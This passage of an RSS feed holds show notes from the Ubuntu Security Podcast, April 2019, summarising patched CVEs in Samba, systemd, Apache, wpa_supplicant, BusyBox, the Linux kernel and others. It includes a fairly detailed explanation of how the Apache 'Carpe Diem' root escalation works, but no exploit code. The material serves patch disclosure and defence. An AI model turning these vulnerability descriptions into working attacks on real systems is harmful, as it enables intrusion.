<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E029.mp3" length="20214308" type="audio/mpeg" /><itunes:duration>21:03</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 28
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-28/</link>
          <pubDate>Mon, 15 Apr 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E028.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 28</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at updates for vulnerabilities in wpa_supplicant, Samba, systemd, wget and more and we talk to Joe about IoT security (or the prevailing lack-thereof).
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at updates for vulnerabilities in wpa_supplicant, Samba, systemd, wget and more and we talk to Joe about IoT security (or the prevailing lack-thereof).</itunes:summary>
        <description>This week we look at updates for vulnerabilities in wpa_supplicant, Samba, systemd, wget and more and we talk to Joe about IoT security (or the prevailing lack-thereof).</description>
        <googleplay:description>This week we look at updates for vulnerabilities in wpa_supplicant, Samba, systemd, wget and more and we talk to Joe about IoT security (or the prevailing lack-thereof).</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at updates for vulnerabilities in wpa_supplicant, Samba, systemd, wget and more and we talk to Joe about IoT security (or the prevailing lack-thereof).</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>27 unique CVEs addressed</p>
<h3 id="usn-3939-1-usn-3939-2-samba-vulnerability">[<a href="https://usn.ubuntu.com/3939-1/">USN-3939-1</a>, <a href="https://usn.ubuntu.com/3939-2/">USN-3939-2</a>] Samba vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3880">CVE-2019-3880</a></li>
</ul>
</li>
<li>Symlink path traversal vulnerability in the Windows Registry service emulation RPC API end-point</li>
<li>Allows a local user to create a new registry file anywhere they have Unix
permissions to do so within the Samba share
<ul>
<li>Bypasses share restrictions such as read-only and share ACLs</li>
<li>Also allows to create the file outside the share itself if there is
already a symlink pointing outside the shared areas</li>
</ul>
</li>
<li>Fixed by removing the ability to save or restore registry keys at all via
this RPC API end-point</li>
</ul>
<h3 id="usn-3940-1-usn-3940-2-clamav-vulnerabilities">[<a href="https://usn.ubuntu.com/3940-1/">USN-3940-1</a>, <a href="https://usn.ubuntu.com/3940-2/">USN-3940-2</a>] ClamAV vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1789">CVE-2019-1789</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1788">CVE-2019-1788</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1787">CVE-2019-1787</a></li>
</ul>
</li>
<li>3 file-handling issues
<ul>
<li>2 OOB heap read when handling PE (Windows EXE and DLL) and PDF files -&gt;
crash -&gt; DoS</li>
<li>OOB heap write when scanning OLE2 files (old format Microsoft Office
documents), crash -&gt; DoS or possible code execution</li>
</ul>
</li>
</ul>
<h3 id="usn-3941-1-lua-vulnerability">[<a href="https://usn.ubuntu.com/3941-1/">USN-3941-1</a>] Lua vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6706">CVE-2019-6706</a></li>
</ul>
</li>
<li>UAF if calling debug.upvaluejoin() with the same function for both function parameters</li>
</ul>
<h3 id="usn-3938-1-systemd-vulnerability">[<a href="https://usn.ubuntu.com/3938-1/">USN-3938-1</a>] systemd vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3842">CVE-2019-3842</a></li>
</ul>
</li>
<li>Failure to properly sanitize environment before using XDG_SEAT</li>
<li>Attacker could set XDG_SEAT such that they can have actions checked
against the wrong PolicyKit policy</li>
<li>Allows a remotely logged in attacker (SSH) to run commands which should
be restricted to only physically present users</li>
<li>Fixed by using secure_getenv() rather than just getenv() - so that if
running via su the existing value is effectively scrubbed from the
environment and ignored</li>
</ul>
<h3 id="usn-3942-1-openjdk-7-vulnerability">[<a href="https://usn.ubuntu.com/3942-1/">USN-3942-1</a>] OpenJDK 7 vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2422">CVE-2019-2422</a></li>
</ul>
</li>
<li>Information leak allows a remote attacker to possibly leverage this to
bypass the Java sandbox</li>
</ul>
<h3 id="usn-3943-1-usn-3943-2-wget-vulnerabilities">[<a href="https://usn.ubuntu.com/3943-1/">USN-3943-1</a>, <a href="https://usn.ubuntu.com/3943-2/">USN-3943-2</a>] Wget vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic, Cosmic (1 in Precise ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5953">CVE-2019-5953</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20483">CVE-2018-20483</a></li>
</ul>
</li>
<li>Heap buffer overflow due to improper memory management - crash -&gt; DoS or possible code execution</li>
<li>By default wget would store the origin URL in an extended attribute on the downloaded file
<ul>
<li>Could include username / password</li>
<li>getfattr -d to dump</li>
<li>changed to NOT store extended attributes by default AND to strip out
any credentials when doing so</li>
<li>doesn&rsquo;t effect Precise ESM</li>
</ul>
</li>
</ul>
<h3 id="usn-3937-2-apache-vulnerabilities">[<a href="https://usn.ubuntu.com/3937-2/">USN-3937-2</a>] Apache vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1312">CVE-2018-1312</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1301">CVE-2018-1301</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15710">CVE-2017-15710</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0217">CVE-2019-0217</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-27/">Episode 27</a> covered mod_auth_digest bypass for other supported releases</li>
<li>Also includes 3 other issues:
<ul>
<li>Nonce generated to prevent reply attacks for HTTP digest authentication
challenenge wasn&rsquo;t sufficiently random
<ul>
<li>Could allow and attacker to reply across a cluster of servers with
the same common digest authentication configuration</li>
<li>changed to actually use a proper random source</li>
</ul>
</li>
<li>Possible OOB read -&gt; crash -&gt; DoS</li>
<li>Possible one-byte memory corruption if specify a character encoding of
only 1 byte (since assumes is at least 2 bytes and so writes a NULL at
index +2 which could be past the end of the header) - crash, DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-3944-1-wpa-supplicant-and-hostapd-vulnerabilities">[<a href="https://usn.ubuntu.com/3944-1/">USN-3944-1</a>] wpa_supplicant and hostapd vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-10743">CVE-2016-10743</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9499">CVE-2019-9499</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9498">CVE-2019-9498</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9497">CVE-2019-9497</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9495">CVE-2019-9495</a></li>
</ul>
</li>
<li>Fix fallback to low-quality PRNG if failed to get an actual random value for a WPS pin</li>
<li>Multiple vulnerabilities discovered in the implementation of WPA3 in
hostapd and wpa_supplicant (aka Dragonblood)
<ul>
<li>2 apply to SAE (Simultaneous Authentication of Equals , also known as
Dragonfly Key Exchange) not relevant since we don&rsquo;t enable SAE support
in our builds (this is used for initial key exchange instead of PSK)</li>
<li>4 apply to the use of EAP-PWD - Extensible Authentication Protocol
Password
<ul>
<li>cache side channel attack</li>
<li>reflection attack
<ul>
<li>may allow an attacker to authenticate without the password but
likely not derive session key or complete the key exchange so no
loss of confidentiality</li>
</ul>
</li>
<li>2 failure to validate crypto components
<ul>
<li>could allow attacker to authenticate AND gain access to session key
and get network access</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-3945-1-ruby-vulnerabilities">[<a href="https://usn.ubuntu.com/3945-1/">USN-3945-1</a>] Ruby vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8325">CVE-2019-8325</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8324">CVE-2019-8324</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8323">CVE-2019-8323</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8322">CVE-2019-8322</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8321">CVE-2019-8321</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8320">CVE-2019-8320</a></li>
</ul>
</li>
<li>Symlink directory traversal issue - gem would delete the target
destination before creating any new directories or files when extracting
a Gem - as this is often run via sudo could allow to delete anything on
target system
<ul>
<li>Fixed to check target paths are symlinks</li>
</ul>
</li>
<li>5 different code-injection attacks:
<ul>
<li>4 via injection of terminal escape sequences in debug code paths to stdout</li>
<li>one via eval() of the stub line in a gemspec file</li>
</ul>
</li>
</ul>
<h3 id="usn-3946-1-rssh-vulnerabilities">[<a href="https://usn.ubuntu.com/3946-1/">USN-3946-1</a>] rssh vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3464">CVE-2019-3464</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3463">CVE-2019-3463</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1000018">CVE-2019-1000018</a></li>
</ul>
</li>
<li>Possible to execute arbitrary shell commands since failed to properly
sanitize environment variables and command-line arguments when executing
rsync or scp</li>
<li>Removed from archive in disco since dead upstream</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="iot-security-discussion-with-joe-mcmanus">IoT Security discussion with Joe McManus</h3>
<ul>
<li><a href="https://arstechnica.com/information-technology/2019/04/new-variants-of-mirai-botnet-detected-targeting-more-iot-devices/">https://arstechnica.com/information-technology/2019/04/new-variants-of-mirai-botnet-detected-targeting-more-iot-devices/</a></li>
<li><a href="https://www.ubuntu.com/core">https://www.ubuntu.com/core</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-generalist">Ubuntu Security Generalist</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1548812">https://boards.greenhouse.io/canonical/jobs/1548812</a></li>
</ul>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E028.mp3" length="20878863" type="audio/mpeg" /><itunes:duration>21:44</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 27
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-27/</link>
          <pubDate>Mon, 08 Apr 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E027.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 27</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        Carpe Diem for Apache HTTP Server, plus updates for Dovecot, PolicyKit and the Linux kernel, and we talk to Joe McManus about the recent Asus ShadowHammer supply chain attack and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>Carpe Diem for Apache HTTP Server, plus updates for Dovecot, PolicyKit and the Linux kernel, and we talk to Joe McManus about the recent Asus ShadowHammer supply chain attack and more.</itunes:summary>
        <description>Carpe Diem for Apache HTTP Server, plus updates for Dovecot, PolicyKit and the Linux kernel, and we talk to Joe McManus about the recent Asus ShadowHammer supply chain attack and more.</description>
        <googleplay:description>Carpe Diem for Apache HTTP Server, plus updates for Dovecot, PolicyKit and the Linux kernel, and we talk to Joe McManus about the recent Asus ShadowHammer supply chain attack and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Carpe Diem for Apache HTTP Server, plus updates for Dovecot, PolicyKit and the Linux kernel, and we talk to Joe McManus about the recent Asus ShadowHammer supply chain attack and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>52 unique CVEs addressed</p>
<h3 id="usn-3928-1-dovecot-vulnerability">[<a href="https://usn.ubuntu.com/3928-1/">USN-3928-1</a>] Dovecot vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7524">CVE-2019-7524</a></li>
</ul>
</li>
<li>Local user root privilege escalation
<ul>
<li>Stack buffer overflow - indexer-worker processes missing bounds check when copying from the index</li>
<li>If local user can modify the dovecot index then could leverage this
for code-execution in the indexer process context</li>
<li>Mitigated by usual hardening techniques (ASLR, stack-protector,
read-only GOT (via RELRO &amp; BIND_NOW))</li>
</ul>
</li>
</ul>
<h3 id="usn-3929-1-firebird-vulnerabilities">[<a href="https://usn.ubuntu.com/3929-1/">USN-3929-1</a>] Firebird vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-6369">CVE-2017-6369</a></li>
<li><a href="https://ubuntu.com/security/CVE-2014-9323">CVE-2014-9323</a></li>
</ul>
</li>
<li>Remote authenticated users execute code</li>
<li>Remote un-authenticated user DoS via op_response action with a non-empty status</li>
</ul>
<h3 id="usn-3934-1-policykit-vulnerability">[<a href="https://usn.ubuntu.com/3934-1/">USN-3934-1</a>] PolicyKit vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6133">CVE-2019-6133</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-23/">Episode 23</a> - fixed kernel to make process start_time via fork() more atomic</li>
<li>Updated policykit to also check UIDs match (so now checks start_time,
PID and UID so can&rsquo;t use another user&rsquo;s authorisations)</li>
</ul>
<h3 id="usn-3935-1-busybox-vulnerabilities">[<a href="https://usn.ubuntu.com/3935-1/">USN-3935-1</a>] BusyBox vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5747">CVE-2019-5747</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20679">CVE-2018-20679</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000517">CVE-2018-1000517</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16544">CVE-2017-16544</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15873">CVE-2017-15873</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2148">CVE-2016-2148</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2147">CVE-2016-2147</a></li>
<li><a href="https://ubuntu.com/security/CVE-2015-9261">CVE-2015-9261</a></li>
<li><a href="https://ubuntu.com/security/CVE-2014-9645">CVE-2014-9645</a></li>
<li><a href="https://ubuntu.com/security/CVE-2011-5325">CVE-2011-5325</a></li>
</ul>
</li>
<li>Mix of issues across various components in BusyBox
<ul>
<li>udhcpc:
<ul>
<li>Information disclosure of stack memory in dhcp client / server
(shared component) due to failure to check DHCP options are correct
size - original fix was incomplete so this got 2 CVEs</li>
<li>Heap buffer overflow via DHCP option parsing of OPTION_6RD (IPv6
rapid deployment on IPv4 infra)</li>
<li>Integer overflow -&gt; heap-based OOB write -&gt; crash -&gt; DoS / code
execution</li>
</ul>
</li>
<li>wget:
<ul>
<li>Heap buffer overflow in wget</li>
</ul>
</li>
<li>shell:
<ul>
<li>Failure to sanitize filenames during tab completion - could allow
code execution etc as user who is running the shell</li>
</ul>
</li>
<li>archive handling
<ul>
<li>Integer overflow in bzip2 decompression - OOB write - crash -&gt; DoS
/ code execution?</li>
<li>Pointer misuse in zip decompression - OOB read - crash -&gt; DoS</li>
<li>directory traversal due to symlinks which point outside the
current working directory when decompressing tar archives
(tyhicks)</li>
</ul>
</li>
<li>module loading
<ul>
<li>allows users to load modules which are otherwise restricted -
assumes modules could specify the path so uses basename() on the
module name - so just need to include a / in the module name to
circumvent other checks</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-3937-1-apache-http-server-vulnerabilities">[<a href="https://usn.ubuntu.com/3937-1/">USN-3937-1</a>] Apache HTTP Server vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-0220">CVE-2019-0220</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0217">CVE-2019-0217</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0196">CVE-2019-0196</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17199">CVE-2018-17199</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17189">CVE-2018-17189</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0211">CVE-2019-0211</a></li>
</ul>
</li>
<li>&ldquo;Carpe Diem&rdquo; and others
<ul>
<li>Local root privilege escalation due to an OOB array access resulting
in arbitrary function call when apache gracefully restarts - done
daily via logrotate at 6:25am
<ul>
<li>affects mod_prefork, mod_worker and mod_event</li>
<li>main server (running as root) shares a memory segment (the
scoreboard) with low-privileged worker processes</li>
<li>PID, last request handled etc - maintained by the worker</li>
<li>worker stores an index into global buckets array in the privileged parent</li>
<li>this gets used on restart to restart the worker but no check is done to ensure this is valid</li>
<li>so since is in shm child can change this index to ensure it points back into the shm segment where it has write access</li>
<li>the bucket contains a function pointer to restart worker - so
since this is now indexed from the shm segment can make this point
to any function of choice - AND this gets executed as root by the
parent</li>
<li>Requires some other bug to turn this into a remote exploit since
need to get R/W access remotely on a worker process</li>
</ul>
</li>
<li>Failure to normalize URLs in a consistent manner - LocationMatch and
RewriteRule might not get applied correctly</li>
<li>Race condition in mod_auth_digest could allow user with valid
credentials to impersonate another and bypass access controls</li>
<li>read after free on string comparison in mod_http2 - crash, DoS</li>
<li>failure to respect session expiry time in mod_session_cookie</li>
<li>DoS via slow-loris type attack to occupy server threads</li>
</ul>
</li>
</ul>
<h3 id="usn-3936-1-advancecomp-vulnerability">[<a href="https://usn.ubuntu.com/3936-1/">USN-3936-1</a>] AdvanceCOMP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9210">CVE-2019-9210</a></li>
</ul>
</li>
<li>Integer overflow when decompressing invalid PNG images - OOB write and
heap OOB read</li>
</ul>
<h3 id="usn-3930-1--usn-dot-ubuntu-dot-com-3930-1--usn-3930-2-linux-kernel-vulnerabilities">[<a href="//usn.ubuntu.com/3930-1/">USN-3930-1</a>, USN-3930-2] Linux kernel vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Cosmic and Bionic (HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9213">CVE-2019-9213</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9162">CVE-2019-9162</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9003">CVE-2019-9003</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8980">CVE-2019-8980</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8956">CVE-2019-8956</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8912">CVE-2019-8912</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7308">CVE-2019-7308</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7222">CVE-2019-7222</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7221">CVE-2019-7221</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6974">CVE-2019-6974</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3460">CVE-2019-3460</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3459">CVE-2019-3459</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19824">CVE-2018-19824</a></li>
</ul>
</li>
<li>Jann Horn (GPZ):
<ul>
<li>mmap minimum address bypass - could allow to turn a kernel NULL
pointer dereference into code execution</li>
<li>ASN.1 decoding for SNMP NAT missing length checks - OOB R/W possible</li>
<li>side-channel attack due to speculation on pointer arithmetic in eBPF
programs (Spectre V1)
<ul>
<li>mitigated when secure boot due to lockdown patches blocking BPF
program loading</li>
</ul>
</li>
<li>Reference counting race-condition in KVM -&gt; UAF -&gt; guest VM crash</li>
</ul>
</li>
<li>UAF + OOPS in IPMI due to race-condition on restart</li>
<li>Memory leak on error path of vfs read operations -&gt; DoS</li>
<li>UAF in SCTP sendmsg - crash / code execution</li>
<li>UAF in AF_ALG due to failure to NULL structure members
<ul>
<li>Originally misclassified by NVD as remotely exploitable, confusion
over socket() use by crypto API?</li>
</ul>
</li>
<li>Info leak and a UAF in KVM when using nested virtualisation - not
enabled by default in Ubuntu kernels unless if install QEMU - this is
enabled automatically</li>
<li>2 different information leak of heap memory in bluetooth subsystem
triggerable by unauthenticated remote attacker</li>
<li>UAF in ALSA USB sound device handling mentioned in <a href="https://ubuntusecuritypodcast.org/episode-20/">Episode 20</a></li>
</ul>
<h3 id="usn-3931-1-usn-3931-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3931-1/">USN-3931-1</a>, USN-3931-2] Linux kernel vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Bionic, Trusty (HWE) and Xenial (HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9213">CVE-2019-9213</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8980">CVE-2019-8980</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8912">CVE-2019-8912</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7308">CVE-2019-7308</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7222">CVE-2019-7222</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7221">CVE-2019-7221</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6974">CVE-2019-6974</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3460">CVE-2019-3460</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3459">CVE-2019-3459</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19824">CVE-2018-19824</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18021">CVE-2018-18021</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14678">CVE-2018-14678</a></li>
</ul>
</li>
<li>10 from above, 2 unique:
<ul>
<li>Potential host system crash / code execution from malicious guest
for KVM on ARM64 as mentioned previously in <a href="https://ubuntusecuritypodcast.org/episode-12/">Episode 12</a></li>
<li>Failure to properly initialise all elements of error handler
callback in Xen - guest VM crash triggerable by an unprivileged
attacker in the guest VM</li>
</ul>
</li>
</ul>
<h3 id="usn-3932-1-usn-3932-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3932-1/">USN-3932-1</a>, USN-3932-2] Linux kernel vulnerabilities</h3>
<ul>
<li>20 CVEs addressed in Xenial and Trusty (HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3819">CVE-2019-3819</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3701">CVE-2019-3701</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-9517">CVE-2018-9517</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16884">CVE-2018-16884</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14613">CVE-2018-14613</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14612">CVE-2018-14612</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14611">CVE-2018-14611</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14610">CVE-2018-14610</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14616">CVE-2018-14616</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14614">CVE-2018-14614</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13100">CVE-2018-13100</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13099">CVE-2018-13099</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13097">CVE-2018-13097</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18249">CVE-2017-18249</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9213">CVE-2019-9213</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7222">CVE-2019-7222</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7221">CVE-2019-7221</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6974">CVE-2019-6974</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3460">CVE-2019-3460</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3459">CVE-2019-3459</a></li>
</ul>
</li>
<li>2 DoS triggerable by root (low priority issue)</li>
<li>UAF in PPP over L2TP</li>
<li>UAF in NFS41+ when using multiple network namespaces</li>
<li>4 different NULL pointer dereferences in btrfs via malicious image</li>
<li>Race condition and various reads of invalid memory areas when mounting
malicious f2fs images</li>
<li>mmap min address bypass and others mentioned previously plus
(bluetooth, kvm etc)</li>
</ul>
<h3 id="usn-3933-1-usn-3933-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3933-1/">USN-3933-1</a>, USN-3933-2] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Trusty and Precise ESM (HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9213">CVE-2019-9213</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7222">CVE-2019-7222</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6974">CVE-2019-6974</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3460">CVE-2019-3460</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3459">CVE-2019-3459</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19824">CVE-2018-19824</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18360">CVE-2017-18360</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-1000410">CVE-2017-1000410</a></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="supply-chain-attacks-and-ubuntu">Supply chain attacks and Ubuntu</h3>
<ul>
<li>Alex and Joe discuss recent Asus ShadowHammer supply chain attack and how this relates to Ubuntu
<ul>
<li><a href="https://securelist.com/operation-shadowhammer/89992/">https://securelist.com/operation-shadowhammer/89992/</a></li>
<li><a href="https://www.forbes.com/sites/jasonevangelho/2019/03/29/shadowhammer-asus-1-million-reasons-switch-from-windows-to-linux/">https://www.forbes.com/sites/jasonevangelho/2019/03/29/shadowhammer-asus-1-million-reasons-switch-from-windows-to-linux/</a></li>
<li><a href="https://www.synopsys.com/content/dam/synopsys/sig-assets/reports/2018-ossra.pdf">https://www.synopsys.com/content/dam/synopsys/sig-assets/reports/2018-ossra.pdf</a></li>
<li><a href="http://go.coverity.com/rs/157-LQW-289/images/2014-Coverity-Scan-Report.pdf">http://go.coverity.com/rs/157-LQW-289/images/2014-Coverity-Scan-Report.pdf</a></li>
</ul>
</li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-generalist">Ubuntu Security Generalist</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1548812">https://boards.greenhouse.io/canonical/jobs/1548812</a></li>
</ul>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
